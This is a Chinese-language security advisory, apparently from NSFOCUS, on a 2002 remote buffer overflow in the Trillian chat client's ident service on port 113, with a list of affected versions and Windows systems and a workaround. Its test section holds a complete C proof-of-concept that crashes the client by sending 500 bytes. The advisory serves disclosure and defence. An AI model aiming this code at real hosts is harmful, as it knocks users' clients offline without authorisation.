首页 -> 安全研究
安全研究
安全漏洞
Trillian Identd远程缓冲区溢出漏洞
发布日期:2002-09-18
更新日期:2002-09-25
受影响系统:
Cerulean Studios Trillian 0.74描述:
Cerulean Studios Trillian 0.73
Cerulean Studios Trillian 0.725
Cerulean Studios Trillian 0.6351
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
BUGTRAQ ID: 5733
Cerulean Studios Trillian是一个聊天程序,和多种即时通讯程序使用相同的接口,包括AIM、ICQ、Yahoo! Messenger、MSN Messenger和IRC。
Trillian包含的identd守护程序对用户请求处理不够正确,远程攻击者可以利用这个漏洞可能以Trillian用户权限在系统上执行任意指令。
Trillian中附带的ident服务程序用于在连接IRC服务器时发送ident应答。ident服务程序对用户提交的请求缺少检查,攻击者可以连接Trillian indentd服务程序监听的113口,并发送418个或者更多字节的数据,可导致客户端崩溃,内存破坏,精心构建随机数据可能以Trillian用户权限在系统上执行任意指令。
<*来源:Lance Fitz-Herbert (fitzies@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103236601328359&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* Trillian-Ident.c
Author: Lance Fitz-Herbert
Contact: IRC: Phrizer, DALnet - #KORP
ICQ: 23549284
Exploits the Trillian Ident Flaw.
Tested On Version .74 and .73
Compiles with Borland 5.5
This Example Will Just DoS The Trillian Client.
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
char payload[500];
int main(int argc, char * argv[]) {
int iret;
struct hostent *host;
SOCKET sockhandle;
SOCKADDR_IN address;
WSADATA wsdata;
if (argc<2) {
printf("\nTrillian Ident DoS\n");
printf("----------------------\n");
printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
printf("Tested On Version .74 and .73\n\n");
printf("Usage: trillian-ident <address>");
return 0;
}
WSAStartup(MAKEWORD(1,1),&wsdata);
printf("Making Socket Now...\n");
sockhandle = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if (sockhandle == SOCKET_ERROR) {
printf("Error Creating Socket\n");
WSACleanup();
return 1;
}
printf("Socket Created\n");
address.sin_family = AF_INET;
address.sin_port = htons(113);
address.sin_addr.s_addr = inet_addr(argv[1]);
if (address.sin_addr.s_addr == INADDR_NONE) {
host = NULL;
printf("Trying To Resolve Host\n");
host = gethostbyname(argv[1]);
if (host == NULL) {
printf("Uknown Host: %s\n",argv[1]);
WSACleanup();
return 1;
}
memcpy(&address.sin_addr, host->h_addr_list[0],host->h_length);
}
printf("Connecting To Server...\n");
iret = connect(sockhandle, (struct sockaddr *) &address, sizeof(address));
if (iret == SOCKET_ERROR) {
printf("Couldnt Connect\n");
WSACleanup();
return 1;
}
printf("Connected to %s!\nSending Payload\n",argv[1]);
memset(payload,'A',500);
send(sockhandle,payload,strlen(payload),0);
Sleep(100);
WSACleanup();
return 0;
}
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 临时关闭ident服务程序,或者使用访问控制限制用户对113口的访问。
浏览次数:3027
严重程度:10(网友投票)
绿盟科技给您安全的保障